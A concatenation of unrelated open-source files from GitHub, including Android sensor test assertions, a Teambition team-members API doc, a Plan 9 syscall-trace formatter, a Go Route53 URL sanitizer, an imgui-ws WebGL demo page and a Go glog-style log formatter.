.overridingErrorMessage("Expected type <%s> but was <%s>.", typeToString(type),
typeToString(actualType)) //
.isEqualTo(type);
return this;
}
public SensorAssert hasVendor(String vendor) {
isNotNull();
String actualVendor = actual.getVendor();
assertThat(actualVendor) //
.overridingErrorMessage("Expected vendor <%s> but was <%s>.", vendor, actualVendor) //
.isEqualTo(vendor);
return this;
}
public SensorAssert hasVersion(int version) {
isNotNull();
int actualVersion = actual.getVersion();
assertThat(actualVersion) //
.overridingErrorMessage("Expected version <%s> but was <%s>.", version, actualVersion) //
.isEqualTo(version);
return this;
}
@TargetApi(KITKAT)
public SensorAssert hasFifoMaxEventCount(float count) {
isNotNull();
float actualCount = actual.getFifoMaxEventCount();
assertThat(actualCount) //
.overridingErrorMessage("Expected max event count to be <%s> but was <%s>.", count,
actualCount) //
.isEqualTo(count);
return this;
}
@TargetApi(KITKAT)
public SensorAssert hasFifoReservedEventCount(float count) {
isNotNull();
float actualCount = actual.getFifoReservedEventCount();
assertThat(actualCount) //
.overridingErrorMessage("Expected reserved event count to be <%s> but was <%s>.", count,
actualCount) //
.isEqualTo(count);
return this;
}
public static String typeToString(@SensorType int type) {
return buildNamedValueString(type) //
.value(TYPE_ACCELEROMETER, "accelerometer")
.value(TYPE_ALL, "all")
.value(TYPE_AMBIENT_TEMPERATURE, "ambient_temperature")
.value(TYPE_GAME_ROTATION_VECTOR, "game_rotation_vector")
.value(TYPE_GEOMAGNETIC_ROTATION_VECTOR, "geomagnetic_rotation_vector")
.value(TYPE_GRAVITY, "gravity")
.value(TYPE_GYROSCOPE, "gyroscope")
.value(TYPE_GYROSCOPE_UNCALIBRATED, "gyroscope_uncalibrated")
.value(TYPE_HEART_RATE, "heart_rate")
.value(TYPE_LIGHT, "light")
.value(TYPE_LINEAR_ACCELERATION, "linear_acceleration")
.value(TYPE_MAGNETIC_FIELD, "magnetic_field")
.value(TYPE_MAGNETIC_FIELD_UNCALIBRATED, "magnetic_field_uncalibrated")
.value(TYPE_ORIENTATION, "orientation")
.value(TYPE_PRESSURE, "pressure")
.value(TYPE_PROXIMITY, "proximity")
.value(TYPE_RELATIVE_HUMIDITY, "relative_humidity")
.value(TYPE_ROTATION_VECTOR, "rotation_vector")
.value(TYPE_SIGNIFICANT_MOTION, "significant_motion")
.value(TYPE_STEP_COUNTER, "step_counter")
.value(TYPE_STEP_DETECTOR, "step_detector")
.value(TYPE_TEMPERATURE, "temperature")
.get();
}
}
| {
"pile_set_name": "Github"
} |
## team.members
### summary
read member list of the team
### method
GET
### route
> /v2/teams/:_id/members
### params
<table>
<thead>
<tr>
<th>key</th>
<th>type</th>
<th>required</th>
<th>description</th>
</tr>
</thead>
<tbody>
<tr>
<td>_id</td>
<td>String(ObjectId|InUrl)</td>
<td>true</td>
<td>team id</td>
</tr>
</tbody>
</table>
### request
```
GET /v2/teams/536c834d26faf71918b774ed/members HTTP/1.1
```
### response
```json
[
{
"_id": "54d98ef83c0b3ada1c4ccf78",
"name": "dajiangyou2",
"pinyin": "dajiangyou2",
"email": "[email protected]",
"__v": 0,
"globalRole": "user",
"isRobot": false,
"pinyins": [
"dajiangyou2"
],
"from": "register",
"updatedAt": "2015-02-10T04:54:16.218Z",
"createdAt": "2015-02-10T04:54:16.218Z",
"source": "teambition",
"avatarUrl": "null",
"id": "54d98ef83c0b3ada1c4ccf78",
"role": "owner"
},
{
"_id": "54d98ef83c0b3ada1c4ccf77",
"name": "dajiangyou1",
"pinyin": "dajiangyou1",
"email": "[email protected]",
"__v": 0,
"globalRole": "user",
"isRobot": false,
"pinyins": [
"dajiangyou1"
],
"from": "register",
"updatedAt": "2015-02-10T04:54:16.217Z",
"createdAt": "2015-02-10T04:54:16.217Z",
"source": "teambition",
"avatarUrl": "null",
"id": "54d98ef83c0b3ada1c4ccf77",
"role": "owner"
},
{
"_id": "54d98ef83c0b3ada1c4ccf77",
"name": "dajiangyou1",
"pinyin": "dajiangyou1",
"email": "[email protected]",
"__v": 0,
"globalRole": "user",
"isRobot": false,
"pinyins": [
"dajiangyou1"
],
"from": "register",
"updatedAt": "2015-02-10T04:54:16.217Z",
"createdAt": "2015-02-10T04:54:16.217Z",
"source": "teambition",
"avatarUrl": "null",
"id": "54d98ef83c0b3ada1c4ccf77",
"role": "owner"
}
]
```
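### usage example
For quick orientation, here is a minimal client-side sketch of calling this endpoint. The base URL `https://api.teambition.com` and the `OAuth2` authorization header are assumptions for illustration only; substitute whatever host and authentication your deployment actually uses.
```ts
// Illustrative only: fetch the member list of a team.
const teamId = '536c834d26faf71918b774ed'; // example _id from the request above
const accessToken = '<your-access-token>'; // placeholder

async function getTeamMembers(): Promise<void> {
  const res = await fetch(`https://api.teambition.com/v2/teams/${teamId}/members`, {
    headers: { Authorization: `OAuth2 ${accessToken}` }, // auth scheme is an assumption
  });
  if (!res.ok) throw new Error(`Request failed: HTTP ${res.status}`);
  const members: Array<{ _id: string; name: string; role: string }> = await res.json();
  console.log(members.map(m => `${m.name} (${m.role})`));
}

getTeamMembers();
```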
| {
"pile_set_name": "Github"
} |
/*
* This file is part of the UCB release of Plan 9. It is subject to the license
* terms in the LICENSE file found in the top-level directory of this
* distribution and at http://akaros.cs.berkeley.edu/files/Plan9License. No
* part of the UCB release of Plan 9, including this file, may be copied,
* modified, propagated, or distributed except according to the terms contained
* in the LICENSE file.
*/
#include "u.h"
#include "../port/lib.h"
#include "mem.h"
#include "dat.h"
#include "fns.h"
#include "sys.h"
/*
* Print functions for system call tracing.
*/
static void
fmtrwdata(Fmt* f, char* a, int n, char* suffix)
{
int i;
char *t;
if(a == nil){
fmtprint(f, "0x0%s", suffix);
return;
}
if(!okaddr((uintptr_t)a, n, 0)){
fmtprint(f, "(BAD %p)%s", a, suffix);
return;
}
a = validaddr(a, n, 0);
t = smalloc(n+1);
for(i = 0; i < n; i++){
if(a[i] > 0x20 && a[i] < 0x7f)
t[i] = a[i];
else
t[i] = '.';
}
fmtprint(f, " %#P/\"%s\"%s", a, t, suffix);
free(t);
}
static void
fmtuserstring(Fmt* f, char* a, char* suffix)
{
int len;
char *t;
if(a == nil){
fmtprint(f, "0/\"\"%s", suffix);
return;
}
a = validaddr(a, 1, 0);
len = ((char*)vmemchr(a, 0, 0x7fffffff) - a);
t = smalloc(len+1);
memmove(t, a, len);
t[len] = 0;
fmtprint(f, "%#p/\"%s\"%s", a, t, suffix);
free(t);
}
/*
*/
void
syscallfmt(uint8_t what, int syscallno, Ar0 *ar0, uint64_t start, uint64_t stop, ...)
{
Proc *up = externup();
void *errstr = nil;
va_list list;
int32_t l;
Fmt fmt;
void *v;
int64_t vl;
int i[2], len;
char *a, **argv;
va_start(list, stop);
fmtstrinit(&fmt);
fmtprint(&fmt, "%c %d %s ", what, up->pid, up->text);
if(syscallno > nsyscall)
fmtprint(&fmt, " %d ", syscallno);
else
fmtprint(&fmt, "%s ", systab[syscallno].n);
if(up->syscalltrace != nil)
free(up->syscalltrace);
up->syscalltrace = nil;
switch(syscallno){
case CHDIR:
case EXITS:
case REMOVE:
a = va_arg(list, char*);
fmtuserstring(&fmt, a, "");
break;
case BIND:
a = va_arg(list, char*);
fmtuserstring(&fmt, a, " ");
a = va_arg(list, char*);
fmtuserstring(&fmt, a, " ");
i[0] = va_arg(list, int);
fmtprint(&fmt, "%#x", i[0]);
break;
case CLOSE:
case NOTED:
case SLEEP:
i[0] = va_arg(list, int);
fmtprint(&fmt, "%d", i[0]);
break;
case DUP:
i[0] = va_arg(list, int);
i[1] = va_arg(list, int);
fmtprint(&fmt, "%d %d", i[0], i[1]);
break;
case ALARM:
l = va_arg(list, unsigned long);
fmtprint(&fmt, "%#lu ", l);
break;
case EXEC:
a = va_arg(list, char*);
fmtuserstring(&fmt, a, "");
argv = va_arg(list, char**);
evenaddr(PTR2UINT(argv));
for(;;){
if (! okaddr((uintptr_t)argv, sizeof(char**), 0))
break;
a = *(char**)validaddr(argv, sizeof(char**), 0);
if(a == nil)
break;
fmtprint(&fmt, " ");
fmtuserstring(&fmt, a, "");
argv++;
}
break;
case FAUTH:
i[0] = va_arg(list, int);
a = va_arg(list, char*);
fmtprint(&fmt, "%d", i[0]);
fmtuserstring(&fmt, a, "");
break;
case SEGBRK:
case RENDEZVOUS:
v = va_arg(list, void*);
fmtprint(&fmt, "%#p ", v);
v = va_arg(list, void*);
fmtprint(&fmt, "%#p", v);
break;
case OPEN:
a = va_arg(list, char*);
fmtuserstring(&fmt, a, " ");
i[0] = va_arg(list, int);
fmtprint(&fmt, "%#x", i[0]);
break;
case RFORK:
i[0] = va_arg(list, int);
fmtprint(&fmt, "%#x", i[0]);
break;
case PIPE:
case BRK_:
v = va_arg(list, int*);
fmtprint(&fmt, "%#p", v);
break;
case CREATE:
a = va_arg(list, char*);
fmtuserstring(&fmt, a, " ");
i[0] = va_arg(list, int);
i[1] = va_arg(list, int);
fmtprint(&fmt, "%#x %#x", i[0], i[1]);
break;
case FD2PATH:
case FSTAT:
case FWSTAT:
i[0] = va_arg(list, int);
a = va_arg(list, char*);
l = va_arg(list, unsigned long);
fmtprint(&fmt, "%d %#p %lu", i[0], a, l);
break;
case NOTIFY:
case SEGDETACH:
v = va_arg(list, void*);
fmtprint(&fmt, "%#p", v);
break;
case SEGATTACH:
i[0] = va_arg(list, int);
fmtprint(&fmt, "%d ", i[0]);
a = va_arg(list, char*);
fmtuserstring(&fmt, a, " ");
/*FALLTHROUGH*/
case SEGFREE:
case SEGFLUSH:
v = va_arg(list, void*);
l = va_arg(list, unsigned long);
fmtprint(&fmt, "%#p %lu", v, l);
break;
case UNMOUNT:
a = va_arg(list, char*);
fmtuserstring(&fmt, a, " ");
a = va_arg(list, char*);
fmtuserstring(&fmt, a, "");
break;
case SEMACQUIRE:
case SEMRELEASE:
v = va_arg(list, int*);
i[0] = va_arg(list, int);
fmtprint(&fmt, "%#p %d", v, i[0]);
break;
case TSEMACQUIRE:
v = va_arg(list, int*);
l = va_arg(list, uint32_t);
fmtprint(&fmt, "%#p %ld", v, l);
break;
case SEEK:
i[0] = va_arg(list, int);
vl = va_arg(list, int64_t);
i[1] = va_arg(list, int);
fmtprint(&fmt, "%d %#llx %d", i[0], vl, i[1]);
break;
case FVERSION:
i[0] = va_arg(list, int);
i[1] = va_arg(list, int);
fmtprint(&fmt, "%d %d ", i[0], i[1]);
a = va_arg(list, char*);
fmtuserstring(&fmt, a, " ");
l = va_arg(list, unsigned long);
fmtprint(&fmt, "%lu", l);
break;
case WSTAT:
case STAT:
a = va_arg(list, char*);
fmtuserstring(&fmt, a, " ");
v = va_arg(list, void*);
l = va_arg(list, unsigned long);
fmtprint(&fmt, "%#p %lu", v, l);
break;
case ERRSTR:
a = va_arg(list, char*);
l = va_arg(list, unsigned long);
fmtuserstring(&fmt, a, " ");
fmtprint(&fmt, "%lu", l);
break;
case AWAIT:
a = va_arg(list, char*);
l = va_arg(list, unsigned long);
fmtprint(&fmt, "%#p %lu", a, l);
break;
case MOUNT:
i[0] = va_arg(list, int);
i[1] = va_arg(list, int);
fmtprint(&fmt, "%d %d ", i[0], i[1]);
a = va_arg(list, char*);
fmtuserstring(&fmt, a, " ");
i[0] = va_arg(list, int);
fmtprint(&fmt, "%#x ", i[0]);
a = va_arg(list, char*);
fmtuserstring(&fmt, a, "");
break;
case PREAD:
i[0] = va_arg(list, int);
fmtprint(&fmt, "%d ", i[0]);
v = va_arg(list, void*);
l = va_arg(list, int32_t);
vl = va_arg(list, int64_t);
if (what == 'E') {
fmtprint(&fmt, "%#P %ld 0x%llx", v, l, vl);
}
break;
case PWRITE:
i[0] = va_arg(list, int);
v = va_arg(list, void*);
l = va_arg(list, int32_t);
vl = va_arg(list, int64_t);
fmtprint(&fmt, "%d ", i[0]);
len = MIN(l, 64);
fmtrwdata(&fmt, v, len, " ");
fmtprint(&fmt, "%ld 0x%llx", l, vl);
break;
}
if (what == 'E') {
fmtprint(&fmt, "\n");
up->syscalltrace = fmtstrflush(&fmt);
return;
}
errstr = "\"\"";
switch(syscallno){
default:
if(ar0->i == -1)
errstr = up->syserrstr;
fmtprint(&fmt, " = %d", ar0->i);
break;
case SEEK:
if(ar0->vl == -1)
errstr = up->syserrstr;
fmtprint(&fmt, " = %lld", ar0->vl);
break;
case NSEC:
fmtprint(&fmt, " = %lld", ar0->vl);
break;
case ALARM:
case PWRITE:
if(ar0->l == -1)
errstr = up->syserrstr;
fmtprint(&fmt, " = %ld", ar0->l);
break;
case EXEC:
case SEGBRK:
case SEGATTACH:
case RENDEZVOUS:
if(ar0->v == (void*)-1)
errstr = up->syserrstr;
fmtprint(&fmt, " = %#p", ar0->v);
break;
case RFORK:
if(ar0->v == (void*)-1)
errstr = up->syserrstr;
fmtprint(&fmt, " = %d", ar0->v);
break;
case AWAIT:
if(ar0->i > 0){
fmtuserstring(&fmt, a, " ");
fmtprint(&fmt, "%lu = %d", l, ar0->i);
}
else{
fmtprint(&fmt, "%#p/\"\" %lu = %d", a, l, ar0->i);
errstr = up->syserrstr;
}
break;
case ERRSTR:
fmtuserstring(&fmt, a, " ");
fmtprint(&fmt, "%lu = %d", l, ar0->i);
break;
case FD2PATH:
if(ar0->i > 0){
fmtuserstring(&fmt, a, " ");
fmtprint(&fmt, "%lu = %d", l, ar0->i);
}
else{
fmtprint(&fmt, "\"\" %lu = %d", l, ar0->i);
errstr = up->syserrstr;
}
break;
case PREAD:
if(ar0->l >= 0){
len = MIN(ar0->l, 64);
fmtrwdata(&fmt, v, len, "");
}
else{
fmtprint(&fmt, " %#p/\"\"", v);
errstr = up->syserrstr;
}
fmtprint(&fmt, " %ld 0x%llx = %d", l, vl, ar0->i);
break;
}
fmtprint(&fmt, " %s %#llu %#llu\n", errstr, start, stop);
up->syscalltrace = fmtstrflush(&fmt);
}
| {
"pile_set_name": "Github"
} |
#!/usr/bin/env python
import nose
nose.main()
| {
"pile_set_name": "Github"
} |
using System.Reflection;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
// General Information about an assembly is controlled through the following
// set of attributes. Change these attribute values to modify the information
// associated with an assembly.
[assembly: AssemblyTitle("SEA3D_Assimp")]
[assembly: AssemblyDescription("")]
[assembly: AssemblyConfiguration("")]
[assembly: AssemblyCompany("Microsoft")]
[assembly: AssemblyProduct("SEA3D_Assimp")]
[assembly: AssemblyCopyright("Copyright © Microsoft 2014")]
[assembly: AssemblyTrademark("")]
[assembly: AssemblyCulture("")]
// Setting ComVisible to false makes the types in this assembly not visible
// to COM components. If you need to access a type in this assembly from
// COM, set the ComVisible attribute to true on that type.
[assembly: ComVisible(false)]
// The following GUID is for the ID of the typelib if this project is exposed to COM
[assembly: Guid("27f7553b-0b71-4831-bf09-6ee83b801f20")]
// Version information for an assembly consists of the following four values:
//
// Major Version
// Minor Version
// Build Number
// Revision
//
// You can specify all the values or you can default the Build and Revision Numbers
// by using the '*' as shown below:
// [assembly: AssemblyVersion("1.0.*")]
[assembly: AssemblyVersion("1.0.0.0")]
[assembly: AssemblyFileVersion("1.0.0.0")]
| {
"pile_set_name": "Github"
} |
package route53
import (
"net/url"
"regexp"
"github.com/aws/aws-sdk-go/aws/awserr"
"github.com/aws/aws-sdk-go/aws/client"
"github.com/aws/aws-sdk-go/aws/request"
"github.com/aws/aws-sdk-go/private/protocol/restxml"
)
func init() {
initClient = func(c *client.Client) {
c.Handlers.Build.PushBack(sanitizeURL)
}
initRequest = func(r *request.Request) {
switch r.Operation.Name {
case opChangeResourceRecordSets:
r.Handlers.UnmarshalError.Remove(restxml.UnmarshalErrorHandler)
r.Handlers.UnmarshalError.PushBack(unmarshalChangeResourceRecordSetsError)
}
}
}
var reSanitizeURL = regexp.MustCompile(`\/%2F\w+%2F`)
func sanitizeURL(r *request.Request) {
r.HTTPRequest.URL.RawPath =
reSanitizeURL.ReplaceAllString(r.HTTPRequest.URL.RawPath, "/")
// Update Path so that it reflects the cleaned RawPath
updated, err := url.Parse(r.HTTPRequest.URL.RawPath)
if err != nil {
r.Error = awserr.New(request.ErrCodeSerialization, "failed to clean Route53 URL", err)
return
}
// Take the updated path so the requests's URL Path has parity with RawPath.
r.HTTPRequest.URL.Path = updated.Path
}
| {
"pile_set_name": "Github"
} |
<html>
<head>
<script src="incppect.js"></script>
<script src="imgui-ws.js"></script>
</head>
<body style="font-family: Georgia, serif;">
<script>
function init() {
var output = document.getElementById('client-info');
incppect.render = function() {
imgui_ws.gl.clearColor(0.45, 0.55, 0.60, 1.00);
imgui_ws.gl.clear(imgui_ws.gl.COLOR_BUFFER_BIT);
imgui_ws.incppect_tex_font(this);
imgui_ws.incppect_draw_lists(this);
imgui_ws.render();
var my_id = this.get_int32('my_id[%d]', -1) || 0;
output.innerHTML = 'Your client Id: ' + my_id;
}
incppect.onerror = function(evt) {
if (typeof evt === 'object') {
output.innerHTML = 'Error: check console for more information';
console.error(evt);
} else {
output.innerHTML = evt;
}
}
incppect.k_requests_update_freq_ms = document.getElementById('update_freq_ms').value;
incppect.init();
imgui_ws.set_incppect_handlers(incppect);
imgui_ws.init('canvas_main');
}
window.addEventListener('load', init);
</script>
<div id=main-container align=left width=900px style='padding-left: 16px; padding-top: 1px;'>
<h2>imgui-ws : demo-null</h2>
<div style='padding: 3px; width: 800px; word-wrap: break-word;'>
The vertex and index arrays for the Dear ImGui scene below are generated server-side.
The arrays are streamed to the WebSocket clients and rendered in the browser using WebGL.
</div>
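<!-- Rough data flow (sketch): each frame the C++ server serializes the Dear ImGui draw data (vertex/index buffers plus draw commands), incppect streams those variables over the WebSocket, and imgui-ws.js uploads them to WebGL buffers and replays the draw commands on the canvas below. -->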
<br>
<div style='padding: 3px; width: 800px; word-wrap: break-word;'>
There can be multiple clients connected simultaneously to the same server (see the "WebSocket clients" window below).
Wait for your client to take control and try playing with the widgets.
Your actions will be visible to all currently connected clients.
</div>
<br>
<div id="client-info"></div>
Update freq: <input type="range" min="16" max="200" value="50" class="slider" id="update_freq_ms"
onChange="incppect.k_requests_update_freq_ms = this.value; update_freq_ms_out.value = this.value;">
<output id="update_freq_ms_out">50</output>[ms]<br>
<br>
<canvas id="canvas_main" width="1200px" height="800px" style="background-color: black;" tabindex="0">Your browser does not support the HTML5 canvas tag.</canvas>
<br>
<a href="https://github.com/ggerganov/imgui-ws"><span class="icon icon--github"><svg viewBox="0 0 16 16" width="16px" height="16px"><path fill="#828282" d="M7.999,0.431c-4.285,0-7.76,3.474-7.76,7.761 c0,3.428,2.223,6.337,5.307,7.363c0.388,0.071,0.53-0.168,0.53-0.374c0-0.184-0.007-0.672-0.01-1.32 c-2.159,0.469-2.614-1.04-2.614-1.04c-0.353-0.896-0.862-1.135-0.862-1.135c-0.705-0.481,0.053-0.472,0.053-0.472 c0.779,0.055,1.189,0.8,1.189,0.8c0.692,1.186,1.816,0.843,2.258,0.645c0.071-0.502,0.271-0.843,0.493-1.037 C4.86,11.425,3.049,10.76,3.049,7.786c0-0.847,0.302-1.54,0.799-2.082C3.768,5.507,3.501,4.718,3.924,3.65 c0,0,0.652-0.209,2.134,0.796C6.677,4.273,7.34,4.187,8,4.184c0.659,0.003,1.323,0.089,1.943,0.261 c1.482-1.004,2.132-0.796,2.132-0.796c0.423,1.068,0.157,1.857,0.077,2.054c0.497,0.542,0.798,1.235,0.798,2.082 c0,2.981-1.814,3.637-3.543,3.829c0.279,0.24,0.527,0.713,0.527,1.437c0,1.037-0.01,1.874-0.01,2.129 c0,0.208,0.14,0.449,0.534,0.373c3.081-1.028,5.302-3.935,5.302-7.362C15.76,3.906,12.285,0.431,7.999,0.431z"/></svg>
</span><span class="repo">Source code</span></a>
</div>
</body>
</html>
| {
"pile_set_name": "Github"
} |
const {Renderer, Figure2D, Mesh2D} = meshjs;
const canvas = document.querySelector('canvas');
const renderer = new Renderer(canvas, {
antialias: true,
});
const figure = new Figure2D();
figure.rect(0, 0, 200, 200);
const mesh = new Mesh2D(figure);
mesh.setLinearGradient({
vector: [0, 0, 200, 200],
colors: [
{offset: 0, color: [1, 0, 0, 1]},
{offset: 0.5, color: [0, 1, 0, 1]},
{offset: 1, color: [0, 0, 1, 1]},
],
});
mesh.translate(200, 50);
const figure2 = new Figure2D();
figure2.arc(0, 0, 50, 0, 2 * Math.PI);
const mesh2 = new Mesh2D(figure2);
mesh2.setRadialGradient({
vector: [0, 0, 0, 0, 0, 50],
colors: [
{offset: 0, color: [1, 0, 1, 1]},
{offset: 0.5, color: [0, 1, 1, 1]},
{offset: 1, color: [1, 0, 1, 1]},
],
});
mesh2.translate(300, 150);
renderer.drawMeshes([mesh, mesh2]);
| {
"pile_set_name": "Github"
} |
// Copyright 2015 CoreOS, Inc.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
package capnslog
import (
"bufio"
"bytes"
"io"
"os"
"runtime"
"strconv"
"strings"
"time"
)
var pid = os.Getpid()
type GlogFormatter struct {
StringFormatter
}
func NewGlogFormatter(w io.Writer) *GlogFormatter {
g := &GlogFormatter{}
g.w = bufio.NewWriter(w)
return g
}
func (g GlogFormatter) Format(pkg string, level LogLevel, depth int, entries ...interface{}) {
g.w.Write(GlogHeader(level, depth+1))
g.StringFormatter.Format(pkg, level, depth+1, entries...)
}
func GlogHeader(level LogLevel, depth int) []byte {
// Lmmdd hh:mm:ss.uuuuuu threadid file:line]
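// e.g. (illustrative): "I0702 15:04:05.123456Z 12345 server.go:42] " followed by the message.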
now := time.Now().UTC()
_, file, line, ok := runtime.Caller(depth) // It's always the same number of frames to the user's call.
if !ok {
file = "???"
line = 1
} else {
slash := strings.LastIndex(file, "/")
if slash >= 0 {
file = file[slash+1:]
}
}
if line < 0 {
line = 0 // not a real line number
}
buf := &bytes.Buffer{}
buf.Grow(30)
_, month, day := now.Date()
hour, minute, second := now.Clock()
buf.WriteString(level.Char())
twoDigits(buf, int(month))
twoDigits(buf, day)
buf.WriteByte(' ')
twoDigits(buf, hour)
buf.WriteByte(':')
twoDigits(buf, minute)
buf.WriteByte(':')
twoDigits(buf, second)
buf.WriteByte('.')
buf.WriteString(strconv.Itoa(now.Nanosecond() / 1000))
buf.WriteByte('Z')
buf.WriteByte(' ')
buf.WriteString(strconv.Itoa(pid))
buf.WriteByte(' ')
buf.WriteString(file)
buf.WriteByte(':')
buf.WriteString(strconv.Itoa(line))
buf.WriteByte(']')
buf.WriteByte(' ')
return buf.Bytes()
}
const digits = "0123456789"
func twoDigits(b *bytes.Buffer, d int) {
c2 := digits[d%10]
d /= 10
c1 := digits[d%10]
b.WriteByte(c1)
b.WriteByte(c2)
}
| {
"pile_set_name": "Github"
} |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--NewPage-->
<HTML>
<HEAD>
<!-- Generated by javadoc (build 1.6.0_33) on Mon Jul 09 20:50:24 BST 2012 -->
<TITLE>
Uses of Class org.hamcrest.object.IsEventFrom (Hamcrest)
</TITLE>
<META NAME="date" CONTENT="2012-07-09">
<LINK REL ="stylesheet" TYPE="text/css" HREF="../../../../stylesheet.css" TITLE="Style">
<SCRIPT type="text/javascript">
function windowTitle()
{
if (location.href.indexOf('is-external=true') == -1) {
parent.document.title="Uses of Class org.hamcrest.object.IsEventFrom (Hamcrest)";
}
}
</SCRIPT>
<NOSCRIPT>
</NOSCRIPT>
</HEAD>
<BODY BGCOLOR="white" onload="windowTitle();">
<HR>
<!-- ========= START OF TOP NAVBAR ======= -->
<A NAME="navbar_top"><!-- --></A>
<A HREF="#skip-navbar_top" title="Skip navigation links"></A>
<TABLE BORDER="0" WIDTH="100%" CELLPADDING="1" CELLSPACING="0" SUMMARY="">
<TR>
<TD COLSPAN=2 BGCOLOR="#EEEEFF" CLASS="NavBarCell1">
<A NAME="navbar_top_firstrow"><!-- --></A>
<TABLE BORDER="0" CELLPADDING="0" CELLSPACING="3" SUMMARY="">
<TR ALIGN="center" VALIGN="top">
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../overview-summary.html"><FONT CLASS="NavBarFont1"><B>Overview</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../package-summary.html"><FONT CLASS="NavBarFont1"><B>Package</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../org/hamcrest/object/IsEventFrom.html" title="class in org.hamcrest.object"><FONT CLASS="NavBarFont1"><B>Class</B></FONT></A> </TD>
<TD BGCOLOR="#FFFFFF" CLASS="NavBarCell1Rev"> <FONT CLASS="NavBarFont1Rev"><B>Use</B></FONT> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../package-tree.html"><FONT CLASS="NavBarFont1"><B>Tree</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../deprecated-list.html"><FONT CLASS="NavBarFont1"><B>Deprecated</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../index-all.html"><FONT CLASS="NavBarFont1"><B>Index</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../help-doc.html"><FONT CLASS="NavBarFont1"><B>Help</B></FONT></A> </TD>
</TR>
</TABLE>
</TD>
<TD ALIGN="right" VALIGN="top" ROWSPAN=3><EM>
</EM>
</TD>
</TR>
<TR>
<TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2">
PREV
NEXT</FONT></TD>
<TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2">
<A HREF="../../../../index.html?org/hamcrest/object/\class-useIsEventFrom.html" target="_top"><B>FRAMES</B></A>
<A HREF="IsEventFrom.html" target="_top"><B>NO FRAMES</B></A>
<SCRIPT type="text/javascript">
<!--
if(window==top) {
document.writeln('<A HREF="../../../../allclasses-noframe.html"><B>All Classes</B></A>');
}
//-->
</SCRIPT>
<NOSCRIPT>
<A HREF="../../../../allclasses-noframe.html"><B>All Classes</B></A>
</NOSCRIPT>
</FONT></TD>
</TR>
</TABLE>
<A NAME="skip-navbar_top"></A>
<!-- ========= END OF TOP NAVBAR ========= -->
<HR>
<CENTER>
<H2>
<B>Uses of Class<br>org.hamcrest.object.IsEventFrom</B></H2>
</CENTER>
No usage of org.hamcrest.object.IsEventFrom
<P>
<HR>
<!-- ======= START OF BOTTOM NAVBAR ====== -->
<A NAME="navbar_bottom"><!-- --></A>
<A HREF="#skip-navbar_bottom" title="Skip navigation links"></A>
<TABLE BORDER="0" WIDTH="100%" CELLPADDING="1" CELLSPACING="0" SUMMARY="">
<TR>
<TD COLSPAN=2 BGCOLOR="#EEEEFF" CLASS="NavBarCell1">
<A NAME="navbar_bottom_firstrow"><!-- --></A>
<TABLE BORDER="0" CELLPADDING="0" CELLSPACING="3" SUMMARY="">
<TR ALIGN="center" VALIGN="top">
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../overview-summary.html"><FONT CLASS="NavBarFont1"><B>Overview</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../package-summary.html"><FONT CLASS="NavBarFont1"><B>Package</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../org/hamcrest/object/IsEventFrom.html" title="class in org.hamcrest.object"><FONT CLASS="NavBarFont1"><B>Class</B></FONT></A> </TD>
<TD BGCOLOR="#FFFFFF" CLASS="NavBarCell1Rev"> <FONT CLASS="NavBarFont1Rev"><B>Use</B></FONT> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../package-tree.html"><FONT CLASS="NavBarFont1"><B>Tree</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../deprecated-list.html"><FONT CLASS="NavBarFont1"><B>Deprecated</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../index-all.html"><FONT CLASS="NavBarFont1"><B>Index</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../help-doc.html"><FONT CLASS="NavBarFont1"><B>Help</B></FONT></A> </TD>
</TR>
</TABLE>
</TD>
<TD ALIGN="right" VALIGN="top" ROWSPAN=3><EM>
</EM>
</TD>
</TR>
<TR>
<TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2">
PREV
NEXT</FONT></TD>
<TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2">
<A HREF="../../../../index.html?org/hamcrest/object/\class-useIsEventFrom.html" target="_top"><B>FRAMES</B></A>
<A HREF="IsEventFrom.html" target="_top"><B>NO FRAMES</B></A>
<SCRIPT type="text/javascript">
<!--
if(window==top) {
document.writeln('<A HREF="../../../../allclasses-noframe.html"><B>All Classes</B></A>');
}
//-->
</SCRIPT>
<NOSCRIPT>
<A HREF="../../../../allclasses-noframe.html"><B>All Classes</B></A>
</NOSCRIPT>
</FONT></TD>
</TR>
</TABLE>
<A NAME="skip-navbar_bottom"></A>
<!-- ======== END OF BOTTOM NAVBAR ======= -->
<HR>
</BODY>
</HTML>
| {
"pile_set_name": "Github"
} |
package filtercompanies
import (
"net/http"
"github.com/aerogo/aero"
"github.com/animenotifier/notify.moe/arn"
